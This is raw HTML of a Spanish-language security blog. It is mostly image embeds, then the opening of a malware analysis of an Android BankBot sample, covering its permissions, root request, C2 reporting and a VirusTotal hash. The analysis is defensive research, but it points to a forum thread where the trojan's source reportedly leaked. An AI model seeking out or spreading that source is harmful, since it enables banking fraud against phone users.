<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSMtSANLjKbO-5Eo2GnTBne80dGc3fgt7yVy4IvC-PU_3ywZKDGzAIY8uR3dJay_BLhFZNRrNDz6aVNBXXQnDNlpiCF-xkNVYKr3gjfZZrf-fjZK2QCzSOHdNl-3OsyAErsO0Ir8vJXQ/s1600/NQiQt524yEJw5.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJSMtSANLjKbO-5Eo2GnTBne80dGc3fgt7yVy4IvC-PU_3ywZKDGzAIY8uR3dJay_BLhFZNRrNDz6aVNBXXQnDNlpiCF-xkNVYKr3gjfZZrf-fjZK2QCzSOHdNl-3OsyAErsO0Ir8vJXQ/s320/NQiQt524yEJw5.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE9kqd-1LtMXmk7_Pa5Uv0wfYi3YXp_sR5TyXRVCNUhEMiUxkUqeSHsbeING333p95WIJKKF6F1HQYL5YEeVZ-quWR-6GoG_T_7IU6VPcyK3m0MfsoqYTX_tOzWbegW5g5VvZwBPIWKjs/s1600/NQiQt524yEJw1.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE9kqd-1LtMXmk7_Pa5Uv0wfYi3YXp_sR5TyXRVCNUhEMiUxkUqeSHsbeING333p95WIJKKF6F1HQYL5YEeVZ-quWR-6GoG_T_7IU6VPcyK3m0MfsoqYTX_tOzWbegW5g5VvZwBPIWKjs/s320/NQiQt524yEJw1.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn1PNNskSmtQrnff3DQJoNUZpRzxNu_5eYlMkDKkJERnNCfyuDeOXw47jWx4L-ESr4RZT0wWAqJplZVnVPoom-IMrvFm0vrUwiKoOA2Gjc4A2L6Sg3y1V8VsMidOAjqmO5Yrbnchk8eFI/s1600/elDCthSMZ4.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn1PNNskSmtQrnff3DQJoNUZpRzxNu_5eYlMkDKkJERnNCfyuDeOXw47jWx4L-ESr4RZT0wWAqJplZVnVPoom-IMrvFm0vrUwiKoOA2Gjc4A2L6Sg3y1V8VsMidOAjqmO5Yrbnchk8eFI/s320/elDCthSMZ4.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv8r3IZJzuZ-fH1QVEQxWrEKk1nX7o7sH_YddryXzUuwC0fJV9tjDreiuUFz-KbqIxqhouzPfYcNpuDmc2TumEXVP15ABgnGd42hq5j2te9H72zQbhIpLr10f0QZVnl3XeHhptM_oZw1c/s1600/JMqWLvlOFTT3fWM.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv8r3IZJzuZ-fH1QVEQxWrEKk1nX7o7sH_YddryXzUuwC0fJV9tjDreiuUFz-KbqIxqhouzPfYcNpuDmc2TumEXVP15ABgnGd42hq5j2te9H72zQbhIpLr10f0QZVnl3XeHhptM_oZw1c/s320/JMqWLvlOFTT3fWM.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji4g5jDpaQ1cog6FVFTe3h7Jmw1rUr-soxFVKmRvUJE_mqWKrctAy603NXIaglES1g1B10WvBEEq4aRGNEkGhuVtzx2ykgYcAx_aKfgofF3hFfTPIvhfgjh15zdOUmn_sxkttYojdjWY/s1600/JMqWLvlOFTT3fWM.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji4g5jDpaQ1cog6FVFTe3h7Jmw1rUr-soxFVKmRvUJE_mqWKrctAy603NXIaglES1g1B10WvBEEq4aRGNEkGhuVtzx2ykgYcAx_aKfgofF3hFfTPIvhfgjh15zdOUmn_sxkttYojdjWY/s320/JMqWLvlOFTT3fWM.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGBMLWD2yan72FSp57HFUJGQMayAKLq7-bZNA4ru5j1T7JBU1SmmaKqSujK4e19GkjhP-n5zS7hqAtoRXOQgIFI2Im6XR04iNL9lcZBksr0p073qf6OtSP43QjF7dG3lirVJ5EREfxX8/s1600/KOOKzh9Gs6I.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzGBMLWD2yan72FSp57HFUJGQMayAKLq7-bZNA4ru5j1T7JBU1SmmaKqSujK4e19GkjhP-n5zS7hqAtoRXOQgIFI2Im6XR04iNL9lcZBksr0p073qf6OtSP43QjF7dG3lirVJ5EREfxX8/s320/KOOKzh9Gs6I.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilZSPFxuqISNg3CcnJhSUqYZB0hXtRhWSjUyr1fQnZZyC1KZuRhDlOY6x_TQlnx96lNJOQ5t9X3VXShTharFHFbxInR7bgFJj8AYRnbcRApWbFIg7Oa1AAav5OhzJn7bb6woYAlS0jOro/s1600/kr2Hfh0w4pKnvKe.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilZSPFxuqISNg3CcnJhSUqYZB0hXtRhWSjUyr1fQnZZyC1KZuRhDlOY6x_TQlnx96lNJOQ5t9X3VXShTharFHFbxInR7bgFJj8AYRnbcRApWbFIg7Oa1AAav5OhzJn7bb6woYAlS0jOro/s320/kr2Hfh0w4pKnvKe.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUbHys3f-xa4A7-MvbFUJRVh0Lmnpdm4xodaBPpZdxI3QXyyaQ195XZPRh39HS2PO0f1xhRjxiO7LAk-NZJkA0dIhmKn8vR4zywN6OxaoQCtCQhI2r3lWn_TiTHe6Wogh3yZuAkEqwyA/s1600/NQiQt524yEJw1.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSUbHys3f-xa4A7-MvbFUJRVh0Lmnpdm4xodaBPpZdxI3QXyyaQ195XZPRh39HS2PO0f1xhRjxiO7LAk-NZJkA0dIhmKn8vR4zywN6OxaoQCtCQhI2r3lWn_TiTHe6Wogh3yZuAkEqwyA/s320/NQiQt524yEJw1.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqEMiiK2V09fLL-TmrMrp36vO5pwcFeTZq5H6adGW5Y8QPRfd32yAaqkh3slwPvvA_mdgjU3alSIBWTisobTBJxEfdpbWO7oI-1DqOyRKKRfX5I_JVXJzONUrLEnyqim5WnPAHGA33tc/s1600/DEBRDwR9.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidqEMiiK2V09fLL-TmrMrp36vO5pwcFeTZq5H6adGW5Y8QPRfd32yAaqkh3slwPvvA_mdgjU3alSIBWTisobTBJxEfdpbWO7oI-1DqOyRKKRfX5I_JVXJzONUrLEnyqim5WnPAHGA33tc/s320/DEBRDwR9.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5w7NexrhfU2dMxsycz6attBEDdMkgNoGw8CCKoftdF7bqpYHmypHTQvpq8uH8E_h0KiBwQr2hZNrUwN7Tnxk73PY76iprXVL5oOP-uLfwjB8fGKzJxD_Gby0U33wnlhZePk9O_dAmTzA/s1600/DEBRDwR7.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5w7NexrhfU2dMxsycz6attBEDdMkgNoGw8CCKoftdF7bqpYHmypHTQvpq8uH8E_h0KiBwQr2hZNrUwN7Tnxk73PY76iprXVL5oOP-uLfwjB8fGKzJxD_Gby0U33wnlhZePk9O_dAmTzA/s320/DEBRDwR7.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBE_zIl2dh5VqNgKu0Fvr-BfWkBLo4MyHEowNg_C1nKeTVRW3dcHdj9xk8D7k-LNnvM-EQINj5m8be4z_wrzQJG4mD_dfw1VSc5pRiLfb2eX-juZLd3kVrlzkYJ33apOpYcFOO8uE2chg/s1600/DEBRDwR5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBE_zIl2dh5VqNgKu0Fvr-BfWkBLo4MyHEowNg_C1nKeTVRW3dcHdj9xk8D7k-LNnvM-EQINj5m8be4z_wrzQJG4mD_dfw1VSc5pRiLfb2eX-juZLd3kVrlzkYJ33apOpYcFOO8uE2chg/s320/DEBRDwR5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh30XcW1k6qYYEgT1vyEa3gwZl_blDtkg9eBuEGoSLvGXpNTl9grartb7eu6hyphenhyphen6WxfW1QV-yPdvUl7RHqBSu6YS5wir8nXc8QfN-ntjCRD9WvX-EcPkiBGHyXv-g31qNzqKhIOrDNu4kM4/s1600/DEBRDwR3.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh30XcW1k6qYYEgT1vyEa3gwZl_blDtkg9eBuEGoSLvGXpNTl9grartb7eu6hyphenhyphen6WxfW1QV-yPdvUl7RHqBSu6YS5wir8nXc8QfN-ntjCRD9WvX-EcPkiBGHyXv-g31qNzqKhIOrDNu4kM4/s320/DEBRDwR3.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdUF6dmEiGB6eHyOGFZ4_M4k75mON2V3nzUsgheepdg9lirIkuGl5GSMLVkc5kvk8u9KOu60ZLV5c2aYaVWsDCo1IYysogJztS2osXwMO8L_zsrIzGu9hr04b2gjbibi70d2-RzVR0ug/s1600/DEBRDwR1.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdUF6dmEiGB6eHyOGFZ4_M4k75mON2V3nzUsgheepdg9lirIkuGl5GSMLVkc5kvk8u9KOu60ZLV5c2aYaVWsDCo1IYysogJztS2osXwMO8L_zsrIzGu9hr04b2gjbibi70d2-RzVR0ug/s320/DEBRDwR1.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRn2dfFnl6OuwzAJqVJFn7oQkDI3voUbxJsV89oiHMgqojZzmFhMmcJXUEaTc_Bcv2nwfuYTaU7AjuPGTEv9iCv0mqjgXNuwqJLCrokOLE3PXx3VPhAfX3DW0MYpN4Br1Rzu33e2UvVUs/s1600/DEBRDwR1.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRn2dfFnl6OuwzAJqVJFn7oQkDI3voUbxJsV89oiHMgqojZzmFhMmcJXUEaTc_Bcv2nwfuYTaU7AjuPGTEv9iCv0mqjgXNuwqJLCrokOLE3PXx3VPhAfX3DW0MYpN4Br1Rzu33e2UvVUs/s320/DEBRDwR1.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8nAt_h2aCqsPtxair4x6g-95HxV1a10A91_y3xAWyknBnKd9Mr87zy_seMTfngvjninBYfLr8sxpmbE0XQgZKCVh8d7_2WWDYuE63SBrjdHp4duuESyIv6evB6UkXIJuZC4c81jAQSFU/s1600/bjajVkQauMyu.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8nAt_h2aCqsPtxair4x6g-95HxV1a10A91_y3xAWyknBnKd9Mr87zy_seMTfngvjninBYfLr8sxpmbE0XQgZKCVh8d7_2WWDYuE63SBrjdHp4duuESyIv6evB6UkXIJuZC4c81jAQSFU/s320/bjajVkQauMyu.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-J1F4cZ05i6E4WYaSlx1djT8Ekq_GB-HlfgdIo4e2jQiwfQEqcDbAzs1AAUCzb-FcHa0MI3iFePzftlHWaxNYU-fPHGX4D7FSG8XXoJGfZM6KdpLv44x-HS96SyYrC27O3IZR9IsHkuo/s1600/bjajVkQauMyu.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-J1F4cZ05i6E4WYaSlx1djT8Ekq_GB-HlfgdIo4e2jQiwfQEqcDbAzs1AAUCzb-FcHa0MI3iFePzftlHWaxNYU-fPHGX4D7FSG8XXoJGfZM6KdpLv44x-HS96SyYrC27O3IZR9IsHkuo/s320/bjajVkQauMyu.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3BOsekLoipaudZ3Xv9__ib2b27EoO6052hmBH1Qb5EEvQehuUMaOTizz7IIgPC_xsRVKROoc-EEJV1P6HS0_kohj41hyphenhyphenaayffN9Z0cQ3AI1gv4YdxGdBhzxLB1m1HNqVmasnsluVMwsM/s1600/chKbzWbi.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3BOsekLoipaudZ3Xv9__ib2b27EoO6052hmBH1Qb5EEvQehuUMaOTizz7IIgPC_xsRVKROoc-EEJV1P6HS0_kohj41hyphenhyphenaayffN9Z0cQ3AI1gv4YdxGdBhzxLB1m1HNqVmasnsluVMwsM/s320/chKbzWbi.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCYTNfD960pD14YBJQJc0CQMmiOxV7LWT2WyOab7nlzEa2UJvipIOynhlpv0Z5LWgQiR-3WPEY9pE11XtQTK4wXwJXEzrcPe67gsdORor4zy-elhoDUxGCLJSIDgnB3QWmoZsJR_6c_64/s1600/chKbzWbi.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCYTNfD960pD14YBJQJc0CQMmiOxV7LWT2WyOab7nlzEa2UJvipIOynhlpv0Z5LWgQiR-3WPEY9pE11XtQTK4wXwJXEzrcPe67gsdORor4zy-elhoDUxGCLJSIDgnB3QWmoZsJR_6c_64/s320/chKbzWbi.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3EDbq2WwEkmOxakg-2BzEMfPtqqpnWhSFVslNYebNium7OM3DuvbG0dgOHZ4GYOwvGd0P5ha10d9A-jGYp098lZkF9QRCqbT9lMCGb6QAAcy_O5AuyiBgepC2vayonbwD2qISl_UITB0/s1600/ci6S0fsesJQh4qON.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3EDbq2WwEkmOxakg-2BzEMfPtqqpnWhSFVslNYebNium7OM3DuvbG0dgOHZ4GYOwvGd0P5ha10d9A-jGYp098lZkF9QRCqbT9lMCGb6QAAcy_O5AuyiBgepC2vayonbwD2qISl_UITB0/s320/ci6S0fsesJQh4qON.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEAA_5UEcu6u_IgiQ6KpYmsc085yAkFrkEFuu6VnwZueneom5AtHYC_vOUW4iXiaT-7cgaBMWWueJIxNmqpgKnPRRqRhvcUL0ZYmVsh1v-ZteVa4dp_1j3scabazaVhyd5Y51SR0W-Gs/s1600/ci6S0fsesJQh4qON.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEAA_5UEcu6u_IgiQ6KpYmsc085yAkFrkEFuu6VnwZueneom5AtHYC_vOUW4iXiaT-7cgaBMWWueJIxNmqpgKnPRRqRhvcUL0ZYmVsh1v-ZteVa4dp_1j3scabazaVhyd5Y51SR0W-Gs/s320/ci6S0fsesJQh4qON.Picture.Data.jpg" width="320" /></a></div>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<span style="background-color: white; color: #444444; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px;">Es todo por el momento @Dkavalanche 2017</span><br />
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com2tag:blogger.com,1999:blog-4220472203730425546.post-32432766177310679172017-06-01T12:43:00.001-07:002017-06-01T12:43:29.529-07:00<b>Android: BankBot.</b><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Hace un tiempo se filtro el fuente de un <a href="hxxps://forum.exploit.in/index.php?showtopic=113555&st=0">Bankbo</a>t para android y se masifico bastante, creo que muchos lo han lanzado para probar sus virtudes.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Este caso que traigo apareció hace un mes aproximadamente, el sitio de comando y control todavia sigue activo pero sin victimas.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Se decía que esta versión afectaba a bancos de Argentina por lo que decidí echarle una mirada.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPjbAL7jOqiSaN-h_94kOijj_6U6HF_K4QfEvi4BLdpCrFJG9_QEq2rliqTPsmz69N6D_sRqAV9Wxj4vcz9jzPcPAehGiV_XFBrK4rwHR6FxLTZqWFc5YVVWV_94jYXxTwFcS1LS-bhbc/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="589" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPjbAL7jOqiSaN-h_94kOijj_6U6HF_K4QfEvi4BLdpCrFJG9_QEq2rliqTPsmz69N6D_sRqAV9Wxj4vcz9jzPcPAehGiV_XFBrK4rwHR6FxLTZqWFc5YVVWV_94jYXxTwFcS1LS-bhbc/s320/00.jpg" width="320" /></a></div>
<br />
<br />
https://www.virustotal.com/en/file/1584174767c12ec6896a7cda9ca0656205e2bece916445b2d6e145fb0ae3cb06/analysis/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5k0_9WXN-2Lext4Kl0ob9aWv-pnP94DwvTrNejIpmqMPjLbO8T6b70NNSm0NWcERxUnDJW_pA_6_1qLz2_iYh5C9yv3f_FE9XFXT9prPUP_8A8UvHs7l1ZXyqg15fx38Cg5EsSx-XCmQ/s1600/Clipboard01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="475" data-original-width="1021" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5k0_9WXN-2Lext4Kl0ob9aWv-pnP94DwvTrNejIpmqMPjLbO8T6b70NNSm0NWcERxUnDJW_pA_6_1qLz2_iYh5C9yv3f_FE9XFXT9prPUP_8A8UvHs7l1ZXyqg15fx38Cg5EsSx-XCmQ/s320/Clipboard01.jpg" width="320" /></a></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Probamos instalarlo en un emulador de Android, se puede ver claramente los permisos que solicita.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nCmFnTSrubC9Dd63S47Y3kcDwrn91sKKYL1NgKD21rxcijUZCOImBXzdCcCQQKVewzMF44rGF3pvMOFmxCNfzUzJXhZOaljywtXFBCF5_ooqBjcPfe9Dtobp9aJmklOYxFxiUK8sKVo/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="681" data-original-width="394" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nCmFnTSrubC9Dd63S47Y3kcDwrn91sKKYL1NgKD21rxcijUZCOImBXzdCcCQQKVewzMF44rGF3pvMOFmxCNfzUzJXhZOaljywtXFBCF5_ooqBjcPfe9Dtobp9aJmklOYxFxiUK8sKVo/s320/2.jpg" width="184" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6GPx-4zSzOs5vkmgp7arEilWmCbWsvP-pDaaZYLLHGE8G0ovgqBsjXH4AqvzHolbl1eeAFzZTS_QNf5s02yIAKbxRR5aTMDj6biBQSt7pvrjG7AgLH2Itu2917rGr4LS4zKurBObJq4/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="376" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6GPx-4zSzOs5vkmgp7arEilWmCbWsvP-pDaaZYLLHGE8G0ovgqBsjXH4AqvzHolbl1eeAFzZTS_QNf5s02yIAKbxRR5aTMDj6biBQSt7pvrjG7AgLH2Itu2917rGr4LS4zKurBObJq4/s320/3.jpg" width="252" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí solicita permiso de ROOT </span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe5krlZNIRCBHVnRXoeBKS7lJBxJde8U912RzTNn1OV6Tn0XpW9cQyrDlVc7jNjh_FViCm1rXEhWtdYijFAvDAjmPFr1FRcPObBclm4eEy8O5AGe3xCItrsR4k3rmd7QDMm74v6anf31M/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="662" data-original-width="399" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe5krlZNIRCBHVnRXoeBKS7lJBxJde8U912RzTNn1OV6Tn0XpW9cQyrDlVc7jNjh_FViCm1rXEhWtdYijFAvDAjmPFr1FRcPObBclm4eEy8O5AGe3xCItrsR4k3rmd7QDMm74v6anf31M/s320/1.jpg" width="192" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Sitio de C2 al cual reporta enviando datos codificados.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguOJwlxKs6eMMZFzQNSuCvxAxQJ_Zd7D736_6qG5TrbDouBn0hUzwMfv1kcwG8DXLEoC44gqLgs2EtprN9Gl3IVTRDIQsqxl_aNtj1SYfo_OxBJTumEOzeEqIbQMU7_J_2NPrOUy5lvi4/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="456" data-original-width="826" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguOJwlxKs6eMMZFzQNSuCvxAxQJ_Zd7D736_6qG5TrbDouBn0hUzwMfv1kcwG8DXLEoC44gqLgs2EtprN9Gl3IVTRDIQsqxl_aNtj1SYfo_OxBJTumEOzeEqIbQMU7_J_2NPrOUy5lvi4/s320/4.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis del C2 en VT,</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH0OKLl9yU3sBlzuaKcNW_5BR2Zk5IP8L_kZb9ELM5Zs0Bm_qDtZRP7dxlTUxm_TUnjFvjjZJmavvCyDKjtxYuYMKFt6nNCFDgM0WHrGSXB02x_1izEhq-nIjrljtspOCIWB1SWahZaHg/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="931" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH0OKLl9yU3sBlzuaKcNW_5BR2Zk5IP8L_kZb9ELM5Zs0Bm_qDtZRP7dxlTUxm_TUnjFvjjZJmavvCyDKjtxYuYMKFt6nNCFDgM0WHrGSXB02x_1izEhq-nIjrljtspOCIWB1SWahZaHg/s320/5.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Aquí podemos observar los mensajes que son enviados al LOGCAT</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxDJqNXZhb-dmSVA1-TTZLgE6j5PqdB6ROxezJq1Y7jtDbolJRdUwmbPasZybkNPDi10OUQ6-duh9Pdq6hLqKUzpGMo2fd3Xz6gwrNvK_r1euMb6PDjFDuRlEj3lJdtgJ5ej_1tSbVrBo/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="237" data-original-width="1043" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxDJqNXZhb-dmSVA1-TTZLgE6j5PqdB6ROxezJq1Y7jtDbolJRdUwmbPasZybkNPDi10OUQ6-duh9Pdq6hLqKUzpGMo2fd3Xz6gwrNvK_r1euMb6PDjFDuRlEj3lJdtgJ5ej_1tSbVrBo/s320/7.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
